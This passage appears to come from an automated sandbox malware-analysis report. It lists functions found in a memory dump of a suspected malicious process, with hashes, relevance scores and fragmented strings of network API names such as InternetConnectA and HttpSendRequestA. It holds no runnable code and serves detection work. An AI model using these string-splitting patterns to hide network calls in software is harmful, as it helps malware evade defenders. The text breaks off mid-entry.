                                                                                                                                                              • String ID: URL: $2$8$L: $\$e$r
                                                                                                                                                              • API String ID: 0-2946516076
                                                                                                                                                              • Opcode ID: 95993f5b1d59af179210df65d56531676005a84b77739bad411b9b3fbcf13d61
                                                                                                                                                              • Instruction ID: 3d6dc973c8b0a7aadb2a9282d1d7b8cba337540d590580618ef742aebc84f583
                                                                                                                                                              • Opcode Fuzzy Hash: 95993f5b1d59af179210df65d56531676005a84b77739bad411b9b3fbcf13d61
                                                                                                                                                              • Instruction Fuzzy Hash: 5A618DB6E10218AACB10DFE4D884FEEB3B9FF18300F04856EE509E7250E7759648CB65
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050290C2 Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: L$S$\$a$c$e$l
                                                                                                                                                              • API String ID: 0-3322591375
                                                                                                                                                              • Opcode ID: cdec3c3c007936475cf91f69040bc4b9089858608269f1fb1be5aa4bbb50465b
                                                                                                                                                              • Instruction ID: 42b9c22c95f0595f6e1b3e95642b6565a13215834d767e3b9b83410c8edbaf74
                                                                                                                                                              • Opcode Fuzzy Hash: cdec3c3c007936475cf91f69040bc4b9089858608269f1fb1be5aa4bbb50465b
                                                                                                                                                              • Instruction Fuzzy Hash: 4641CB72D10228BADB50DF95EC88EEEB7F9FF48710F15855AD80DA7100EB715A858BD0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050290BE Relevance: 8.8, Strings: 7, Instructions: 90COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: L$S$\$a$c$e$l
                                                                                                                                                              • API String ID: 0-3322591375
                                                                                                                                                              • Opcode ID: c4adde24b34db2e59df23fe45999e0d130708cfd9287ba2343670822bb622289
                                                                                                                                                              • Instruction ID: c872037ce9d481037fb10623c656d7cedcb986ef4c7933a86280d478d7c8bc70
                                                                                                                                                              • Opcode Fuzzy Hash: c4adde24b34db2e59df23fe45999e0d130708cfd9287ba2343670822bb622289
                                                                                                                                                              • Instruction Fuzzy Hash: B931B371D10228BADB50DFA5DC88FEEB7F9FF48700F15856AE90DA7100EB704A858B90
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CDD2 Relevance: 8.8, Strings: 7, Instructions: 48COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                                                                                                                                              • API String ID: 0-1024195942
                                                                                                                                                              • Opcode ID: 09ee44c42201e152be619114b001354a29684353d5b5879cea72806e15ea9897
                                                                                                                                                              • Instruction ID: be460aaac034cfb89820a7502ef49eb6db26fe8a882dc54913fccea42067b94f
                                                                                                                                                              • Opcode Fuzzy Hash: 09ee44c42201e152be619114b001354a29684353d5b5879cea72806e15ea9897
                                                                                                                                                              • Instruction Fuzzy Hash: 2D011BB2A05118AFCB14DF98D940DEF77B8EB48210F058289BE08A7200D670AE10CBE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CE52 Relevance: 8.8, Strings: 7, Instructions: 48COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Http$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                                                                                              • API String ID: 0-4071423757
                                                                                                                                                              • Opcode ID: a53f010e68137af92daeea66d1fa971bd25edbc7885f1218b7d48149980b0e3c
                                                                                                                                                              • Instruction ID: bf6891f917e1dfebc2a11a5962e05af2fab5acc6ba48facdf4fbbd64fca5c4ec
                                                                                                                                                              • Opcode Fuzzy Hash: a53f010e68137af92daeea66d1fa971bd25edbc7885f1218b7d48149980b0e3c
                                                                                                                                                              • Instruction Fuzzy Hash: 110129B2A04158AFCB00DF88D841DEF77F8EB48210F158299FD48A7204D630AE10CBE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CE4B Relevance: 8.8, Strings: 7, Instructions: 45COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Http$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                                                                                                                                              • API String ID: 0-4071423757
                                                                                                                                                              • Opcode ID: ed152f6a6868436c0f160e038e6a1ea7d195fecf80de1bb4fa6166c876a39950
                                                                                                                                                              • Instruction ID: dcad74f6cd82c9e1f9b0f038b45f3624bd2bdd93c6f7ff31ed68b7eba89404ab
                                                                                                                                                              • Opcode Fuzzy Hash: ed152f6a6868436c0f160e038e6a1ea7d195fecf80de1bb4fa6166c876a39950
                                                                                                                                                              • Instruction Fuzzy Hash: 570129B2905158AFCB00DF98D881DEF7BB9EF58250F158688FD59A7205D630AE11CBA1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0500D9F2 Relevance: 8.8, Strings: 7, Instructions: 43COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: %$&$3$L$Q$Z$z
                                                                                                                                                              • API String ID: 0-3987438779
                                                                                                                                                              • Opcode ID: 274a507929067a8e6f48feb2e68144a192d1aa80622cb30f0549fabc60d003ab
                                                                                                                                                              • Instruction ID: 264643bbc27452e0e3dfefc5fea59e0cc52fcca5b988213c5ac9d3f7d578e4fe
                                                                                                                                                              • Opcode Fuzzy Hash: 274a507929067a8e6f48feb2e68144a192d1aa80622cb30f0549fabc60d003ab
                                                                                                                                                              • Instruction Fuzzy Hash: 6111AC10D0C7CADADB12C6BC98186AEBF715F13224F4883D9D4F52A2D2D2754606C7A6
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CED2 Relevance: 8.8, Strings: 7, Instructions: 42COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Http$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                                                                                                                                              • API String ID: 0-1070052511
                                                                                                                                                              • Opcode ID: b37026f018ddc2e03a3b72d657df8e016ef45fad3e2d1f9bf8480cd858d1acf1
                                                                                                                                                              • Instruction ID: 664a1bd90c57378592ed8fb27dd1375cf1f5df8ec77d5f79e0fbf14b959f28be
                                                                                                                                                              • Opcode Fuzzy Hash: b37026f018ddc2e03a3b72d657df8e016ef45fad3e2d1f9bf8480cd858d1acf1
                                                                                                                                                              • Instruction Fuzzy Hash: 59014BB2A09158AFCB00DF98D8459EFBBB8EB59210F148199FD18A7204D670AE10CBE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CF42 Relevance: 8.8, Strings: 7, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: File$Inte$InternetReadFile$Read$ReadFile$rnet$rnetReadFile
                                                                                                                                                              • API String ID: 0-4188302782
                                                                                                                                                              • Opcode ID: bbf4dd8ff37cb316677ed50d0ee159931f1d4f4eaf04ab5c703e6e9f86f304c8
                                                                                                                                                              • Instruction ID: b7a5ea9474d834a788645ba1fb3d7d2e3eec95600376a37e374624b6c9cb92fe
                                                                                                                                                              • Opcode Fuzzy Hash: bbf4dd8ff37cb316677ed50d0ee159931f1d4f4eaf04ab5c703e6e9f86f304c8
                                                                                                                                                              • Instruction Fuzzy Hash: 450181B2905118AFDB00DF98D945AFFBBB8FF44210F048199FD48AB200D270AE10CBE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CF3F Relevance: 8.8, Strings: 7, Instructions: 37COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: File$Inte$InternetReadFile$Read$ReadFile$rnet$rnetReadFile
                                                                                                                                                              • API String ID: 0-4188302782
                                                                                                                                                              • Opcode ID: 1cbb90d570f27f503477b425b01d292e3a37292bd46057aa112d2986ab9f7160
                                                                                                                                                              • Instruction ID: 3ae1e4c7dac1e76fc30b00ea6293e3b087268846c6601b65f4ec3e57a5d19a68
                                                                                                                                                              • Opcode Fuzzy Hash: 1cbb90d570f27f503477b425b01d292e3a37292bd46057aa112d2986ab9f7160
                                                                                                                                                              • Instruction Fuzzy Hash: 340181B1901128AFDB10DF98D945AEFBBB8FF54250F148188ED09AB204D3309E10CBE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05023327 Relevance: 7.8, Strings: 6, Instructions: 254COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: A$c$g$s$t$u
                                                                                                                                                              • API String ID: 0-3813946880
                                                                                                                                                              • Opcode ID: c8d42c9a961676ff9149bfabb6650dcde4cacdb32f2f6d2a67bff4786ed9b589
                                                                                                                                                              • Instruction ID: b58ba5d51d90135e42a16fea52ad261d8a59d8e209f72934923cb45b2c036e2e
                                                                                                                                                              • Opcode Fuzzy Hash: c8d42c9a961676ff9149bfabb6650dcde4cacdb32f2f6d2a67bff4786ed9b589
                                                                                                                                                              • Instruction Fuzzy Hash: 1CA17CB5D00228AADB25DFA4DC59FFEB3BCBF58300F0485ADE509A6140EB745B84CB65
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05023332 Relevance: 7.8, Strings: 6, Instructions: 250COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: A$c$g$s$t$u
                                                                                                                                                              • API String ID: 0-3813946880
                                                                                                                                                              • Opcode ID: e29ea7fbc4924e9dee5d3bef93c5d424a99cdc8846ce2cdf7fddfc945d9a4271
                                                                                                                                                              • Instruction ID: 37114f5001a7d563e9cd82946a4a30ea4efb8e6a7a3af6d73eb8f6643d1dd710
                                                                                                                                                              • Opcode Fuzzy Hash: e29ea7fbc4924e9dee5d3bef93c5d424a99cdc8846ce2cdf7fddfc945d9a4271
                                                                                                                                                              • Instruction Fuzzy Hash: 3DA16DB5D00228AADB25DFA4DC59FFEB3BCBF58300F0485ADE509A6140EB745B44CB65
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050213B2 Relevance: 7.7, Strings: 6, Instructions: 168COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: F$P$T$f$r$x
                                                                                                                                                              • API String ID: 0-2523166886
                                                                                                                                                              • Opcode ID: 24454beb88cbb1e68d7ed79145285525c22ea384bf8c6aa6d3d205d5f1f1bfc1
                                                                                                                                                              • Instruction ID: e94678370cd1641a38991345a2f35b0add32b57b2082380bf933fb516e2b3687
                                                                                                                                                              • Opcode Fuzzy Hash: 24454beb88cbb1e68d7ed79145285525c22ea384bf8c6aa6d3d205d5f1f1bfc1
                                                                                                                                                              • Instruction Fuzzy Hash: 5751D571A05324AAEB74DFA5E888BEEB3FCFF14700F04455EA54A56180E7B4A684CB91
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05014CF2 Relevance: 7.6, Strings: 6, Instructions: 90COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 10$2008$2012$2016$7$8
                                                                                                                                                              • API String ID: 0-783846285
                                                                                                                                                              • Opcode ID: 3c9f68b8ec7d5dc56c5e9d543e57d698b211691f56466fc323f750f2e8059aa5
                                                                                                                                                              • Instruction ID: b9621e5a901b417707895fe201b63a0bc39e2fe774e4fc5530ce6584a1a90f5d
                                                                                                                                                              • Opcode Fuzzy Hash: 3c9f68b8ec7d5dc56c5e9d543e57d698b211691f56466fc323f750f2e8059aa5
                                                                                                                                                              • Instruction Fuzzy Hash: C5218DA1D412286AEF01EE90ED05BFE77ACAF24344F04405AED09A6281E3B58619C7E7
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05014CE8 Relevance: 7.6, Strings: 6, Instructions: 83COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: 10$2008$2012$2016$7$8
                                                                                                                                                              • API String ID: 0-783846285
                                                                                                                                                              • Opcode ID: b86499971ce0d11ec6e3560c303007b6d5dc47ef4cfc14683efa50e9bb8aa222
                                                                                                                                                              • Instruction ID: f57aa0f5a522afcdabbaf0e995dc68e0234211248f9f589c7a7ce3da60a24c76
                                                                                                                                                              • Opcode Fuzzy Hash: b86499971ce0d11ec6e3560c303007b6d5dc47ef4cfc14683efa50e9bb8aa222
                                                                                                                                                              • Instruction Fuzzy Hash: 9D216DA1D412286AEF01DF90ED05BFE77BCAF25344F044059ED05A6291E3B58619C7E7
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050213AD Relevance: 7.6, Strings: 6, Instructions: 74COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: F$P$T$f$r$x
                                                                                                                                                              • API String ID: 0-2523166886
                                                                                                                                                              • Opcode ID: 8d3a6486ca05b4d75a66aa7e47dca8f0aa19b912eaee0d06fb1e074a854658ed
                                                                                                                                                              • Instruction ID: 6886ce5b4fbc4454996cd08e6b1b23ced663c5ea49ec76c350ca3e5ad5c789f8
                                                                                                                                                              • Opcode Fuzzy Hash: 8d3a6486ca05b4d75a66aa7e47dca8f0aa19b912eaee0d06fb1e074a854658ed
                                                                                                                                                              • Instruction Fuzzy Hash: 1B11D8B2E101287ADB20EF94EC49AEE777DFF55310F008259EC0866240FBB64A45CBE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CD62 Relevance: 7.5, Strings: 6, Instructions: 41COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                                                                                              • API String ID: 0-3155091674
                                                                                                                                                              • Opcode ID: dfb678c8f92943d01b7d85fa9f9be9ccfe7264b614b24c50130d97bdf7956ac5
                                                                                                                                                              • Instruction ID: e7c825d21ecfde0c032644c17c6c3befc5018d42dc1ef2d80b1d5ec4c116776c
                                                                                                                                                              • Opcode Fuzzy Hash: dfb678c8f92943d01b7d85fa9f9be9ccfe7264b614b24c50130d97bdf7956ac5
                                                                                                                                                              • Instruction Fuzzy Hash: D4011DB2A15128AF9B10DF98D845DFFB7B8FF48310F048589BD5897201D675AE10CBE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CD61 Relevance: 7.5, Strings: 6, Instructions: 36COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                                                                                                                                              • API String ID: 0-3155091674
                                                                                                                                                              • Opcode ID: 9399f14bde64643c773783530733c3fd6ff2abecf1c2f87801eee2a4054fbe2f
                                                                                                                                                              • Instruction ID: 25accdfd7515000b612e86ff2568d854ff3c1b57000ca9ca30e8356d76a3ddf8
                                                                                                                                                              • Opcode Fuzzy Hash: 9399f14bde64643c773783530733c3fd6ff2abecf1c2f87801eee2a4054fbe2f
                                                                                                                                                              • Instruction Fuzzy Hash: 45F03CB2901128AF9B00DF88D845DEFB7B8FF48300F048589BE5867201D674AE10CBE1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CFB2 Relevance: 7.5, Strings: 6, Instructions: 34COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                                                                                                                              • API String ID: 0-4067651292
                                                                                                                                                              • Opcode ID: 7b69bd849438e19f7a9edc5014419eb2a5e2c6657efc69cf052828d5bdeed89e
                                                                                                                                                              • Instruction ID: 925292d1c6546bf53aa4f0fec5050820f63b8d4699e340bdf5d7077466e8ff17
                                                                                                                                                              • Opcode Fuzzy Hash: 7b69bd849438e19f7a9edc5014419eb2a5e2c6657efc69cf052828d5bdeed89e
                                                                                                                                                              • Instruction Fuzzy Hash: 2EF096B2D05128AFCB00DFD9D9459EEB7B8FB45310F108199ED4867200D6705B11CBD1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0502CFAB Relevance: 7.5, Strings: 6, Instructions: 33COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Clos$CloseHandle$Inte$dle$eHan$rnet
                                                                                                                                                              • API String ID: 0-4067651292
                                                                                                                                                              • Opcode ID: 0f0ae6ff7d0c778d439ad1bc121e5aeecb0beb8f8e0fa7a7880a371dbd42b5e4
                                                                                                                                                              • Instruction ID: 7c4ec3a1e23483634f0085b96d39015ee5c5267459898f3d7169b909e2674b87
                                                                                                                                                              • Opcode Fuzzy Hash: 0f0ae6ff7d0c778d439ad1bc121e5aeecb0beb8f8e0fa7a7880a371dbd42b5e4
                                                                                                                                                              • Instruction Fuzzy Hash: 74F090B2D05268AFCB50DFD9E945AEEBBB8FB45310F148199E948AB201D2705B01CBD1
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05022C0F Relevance: 6.5, Strings: 5, Instructions: 220COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: %m$~$Gon~$~F@7$~draGon~$~draGon~
                                                                                                                                                              • API String ID: 0-652033395
                                                                                                                                                              • Opcode ID: 33c2d09647f15b374f2e687569575d6b973215c0476ba6889fd1f5478b8912e7
                                                                                                                                                              • Instruction ID: 230f964e15309590ff4867cdbbf5e964cd3c82d58513051f6044e485c6005d44
                                                                                                                                                              • Opcode Fuzzy Hash: 33c2d09647f15b374f2e687569575d6b973215c0476ba6889fd1f5478b8912e7
                                                                                                                                                              • Instruction Fuzzy Hash: 0B717776E0827A5ADF20DFE8EC48BFE7BE96F65200F444096D88C67140E6789B448B52
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 05020B22 Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $i$l$o$u
                                                                                                                                                              • API String ID: 0-2051669658
                                                                                                                                                              • Opcode ID: cf389f1af12853e40693c765120124b1bfeccd2f27855282aec3b1b2a6dab1e5
                                                                                                                                                              • Instruction ID: 48f2371e524816d2c2fe7130a3df0d1b057773b062d43be47c2566c063b0ab55
                                                                                                                                                              • Opcode Fuzzy Hash: cf389f1af12853e40693c765120124b1bfeccd2f27855282aec3b1b2a6dab1e5
                                                                                                                                                              • Instruction Fuzzy Hash: A66192B5A00318AFDB20DBA4DC94FEFB7FDAF48700F104959E51AA7240E734AA40CB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 050240A2 Relevance: 6.4, Strings: 5, Instructions: 130COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_4fe0000_UHPrrMeffyCaz.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: $e$e$o$y
                                                                                                                                                              • API String ID: 0-3109010100
                                                                                                                                                              • Opcode ID: 42e6bdaf971334df32b3977f5680aa3b2484d3c20f51e1ad28d3f16dc764bb96
                                                                                                                                                              • Instruction ID: 5e52f26fab1c9a4e28615d24a22ac6014b53733ab44a05521c5a377d4278d879
